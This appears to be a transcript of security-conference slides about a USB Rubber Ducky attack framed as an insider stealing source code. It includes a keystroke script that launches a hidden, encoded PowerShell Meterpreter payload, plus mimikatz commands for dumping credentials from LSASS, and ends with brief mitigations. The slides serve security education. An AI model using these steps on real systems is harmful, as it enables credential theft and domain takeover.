duck hunter - the return of autorun
TRANSCRIPT
10/02/201410/02/2014 Nimrod LevyInformation security consultant
Nimrod LevyInformation security consultant
Duck HunterDuck HunterThe return of autorunThe return of autorun
$ WHOAMI$ WHOAMI
• Information Security consultant at 2Bsecure@Matrix• Certified OSCP (Offensive Security Certified Professional)• Security tools personally developed:
AutoBrowser 3.0 Subdomain Analyzer PyWeakServices tool
• 1st Place at The Israel Cyber Challenge, 2014The Symantec™ Cyber Readiness Challenge was hosted during the CyberTech event
The missionThe mission
We are employees in the “Fakesoft” company and we are
very disappointed by the way the administration is
behaving.
We think that we can develop the software by ourselves
and make a fortune. We need to find a way to take over a
"Domain Admin" user account, through this account get
access to the backup server, and copy the source code of
the software.
ObstaclesObstacles
• Antivirus software is installed and running on end-user stations.
• No internet access.• Segmentation with a central firewall• Use of all removable storage is denied from the stations.
Programmable HID USB KeyboardProgrammable HID USB Keyboard
USB Rubber ducky:
USB rubber ducky is a smart device
which can emulate a keyboard or a
mouse when connected to a
computer and can execute a pre
programmed instructions.
Programmable HID USB KeyboardProgrammable HID USB Keyboard
Examples of attack vector scenarios:
• Add users to the system
• Deploy and run programs
• Upload local files
• Download and install apps
• Go to website that the victim has cookies for, and perform
a CSRF attack.
Scenario codeScenario code
DELAY 3000
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 800
ENTER
ENTER
STRING powershell -nop -wind hidden -noni –enc METERPRETER ENCRYPTED AND ENCODED PAYLOAD
ENTER
What do we need ?What do we need ?
Meterpreter payload stager:
Meterpreter is an advanced, dynamically extensible payload
that uses in-memory DLL injection stagers and is extended
over the network at runtime.
What do we need ?What do we need ?
Mimikatz:
Mimikatz is a post-exploitation tool written by Benjamin
Delpy (gentilkiwi).
The functionality of Mimikatz we can use is the dumped
sessions saved within LSASS and obtain clear-text
credentials of user accounts that connected to this machine.
Post-exploitation scenarioPost-exploitation scenario
Command Explanation
getsystem Attempt to elevate your privilege to local system.
load mimikatz Loading mimikatz extension
mimikatz_command -f
sekurlsa::logonPasswords full
Run a custom command.This module extracts passwords that saved on lsass memory
background Backgrounds the current session
ResultResult
Now we have taken control of a domain admin account that
is not linked directly to us. What can we do?
• Copy the source code we initially wanted.
• Delete or manipulate sensitive organizational data.
• Full control of user account management.
• Install malicious applications using the GPO.
MitigationMitigation
• Define a whitelist for authorized devices.
• Increase awareness for social engineering among the
employees.